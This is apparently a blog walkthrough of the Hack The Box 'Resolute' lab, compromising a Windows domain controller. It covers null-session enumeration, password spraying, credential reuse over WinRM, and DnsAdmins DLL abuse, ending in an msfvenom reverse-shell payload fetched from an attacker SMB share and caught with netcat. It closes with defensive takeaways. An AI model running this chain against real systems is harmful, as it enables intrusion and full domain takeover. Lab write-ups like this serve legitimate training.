Resolute | Hack The Box Walkthrough | OSCP Style
In Active Directory environments, initial access doesn’t always require a zero-day exploit. Often, a combination of legacy…
In Active Directory environments, initial access doesn’t always require a zero-day exploit. Often, a combination of legacy misconfigurations and poor operational security (such as leaving passwords in user descriptions or command histories) is all it takes to compromise a domain. In this writeup, we will walk through the compromise of the Resolute machine. We’ll cover null session enumeration, password spraying, discovering hidden credentials in file systems, and finally, escalating privileges to SYSTEM by abusing the
DnsAdminsgroup.
Let’s dive into the technical step-by-step.
Reconnaissance
As standard procedure, we begin by mapping the attack surface with a comprehensive TCP port scan against the target IP.
sudo nmap -p- --open -sS -sV -sC --min-rate 5000 -vvv -n 10.10.10.169 -oN result.txt

The scan reveals a standard Domain Controller profile, exposing ports for RPC (135), SMB (139/445), LDAP (389/3268), and WinRM (5985).
When encountering RPC and SMB on a domain controller, one of the first checks is whether anonymous binding (null sessions) is allowed. We use rpcclient with a blank username (-U '') to attempt enumeration.
rpcclient -U '' 10.10.10.169 -N -c 'enumdomusers' | grep -oP '\[.*?\]' | grep -v 0x | tr -d '[]'

The null session is successful, allowing us to dump the complete list of domain users. To dig deeper, we run the querydispinfo command, which extracts the user descriptions.
rpcclient -U '' 10.10.10.169 -N -c 'querydispinfo'

This reveals a massive OPSEC failure: the description for the user marko contains a hardcoded, legacy default password: Welcome123!.
Armed with a valid user list and a known password, we use crackmapexec to perform a password spraying attack across the domain.
crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success

The password no longer works for marko, but we get a successful hit for the user melanie.
Initial Access & Lateral Movement
With valid credentials for melanie, we leverage the open WinRM port to establish an interactive remote session.
crackmapexec winrm 10.10.10.169 -u 'melanie' -p 'Welcome123!'
evil-winrm -i 10.10.10.169 -u 'melanie' -p 'Welcome123!'


Once on the system, we check our privileges (whoami /priv) and begin enumerating the file system.
whoami /priv
dir -force

Using dir -force allows us to view hidden files and directories. During our enumeration of the root directory and user folders, we uncover a hidden file (often PowerShell transcripts or history files) containing the plaintext credentials for another user: ryan.


Credentials obtained: ryan : Serv3r4Admin4cc123!.
We pivot to this new user by opening a fresh WinRM session.
evil-winrm -i 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'

Logging in as ryan, we immediately notice a note.txt file, which hints at administrative tasks being performed.
type note.txt

Privilege Escalation
To understand our new attack paths, we enumerate ryan's group memberships.
whoami /all

The output shows that ryan is a member of the Contractors group. We cross-reference this by listing local and domain groups.
net localgroup
net localgroup DnsAdmins


We discover that the Contractors group is nested inside the DnsAdmins group. This is a well-known privilege escalation vector. Members of DnsAdmins have the authority to manage the DNS service, which runs as NT AUTHORITY\SYSTEM. Specifically, this group can configure the DNS server to load an arbitrary DLL using the /serverlevelplugindll parameter.
We generate a malicious DLL payload using msfvenom that will send a reverse shell back to our attacker machine.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=9292 -f dll > pwned.dll

We then host this DLL on an Impacket SMB server so the target machine can pull it remotely without us needing to drop it on the disk.
impacket-smbserver crypto . -smb2support

Using dnscmd.exe, we inject our remote DLL path into the DNS configuration.

dnscmd.exe /config /serverlevelplugindll \\10.10.14.6\crypto\pwned.dl
To trigger the payload, we must restart the DNS service. Note: In some scenarios, you may need to stop and start the service multiple times until the SMB authentication callback is received.
sc.exe stop dns
sc.exe start dns


Finally, we catch the SYSTEM shell on our netcat listener.
rlwrap nc -lnvp 9292

Conclusion
Resolute is a fantastic, realistic box. The foothold mirrors how real intrusions often begin, not with a service exploit, but with OSINT and a user opening the wrong document or, in this case, leaving passwords in Active Directory descriptions. The rest is a masterclass in Active Directory abuse: a single misconfigured description let us pivot to a user, a careless PowerShell history file gave us another session, and dangerous group nesting carried us to the administrator’s secrets. Each permission looked harmless in isolation; chained together, they meant full domain compromise.
Key takeaways:
- Sanitize Active Directory Attributes: AD attributes like
descriptionorinfoare readable by any authenticated user by default. Never store passwords or sensitive infrastructure details in them. - Clear Operational History: PowerShell transcripts and
ConsoleHost_history.txtfiles are prime targets during post-exploitation. Ensure administrators clear their history after performing sensitive tasks, or disable history saving for specific service accounts. - Audit DnsAdmins Group: The
DnsAdminsgroup is virtually equivalent to Domain Admin because it allows code execution as SYSTEM on the Domain Controller. Strictly limit membership and monitor the DNS service for anomalous DLL loads. - Disable Null Sessions: Anonymous RPC binding allowed us to dump the entire user list without authenticating. This should be disabled in modern Windows environments.
References
If you’re interested in following my upcoming articles on OT/ICS, certifications, HTB content, and Red Team experiences, I invite you to connect with me on LinkedIn or Instagram.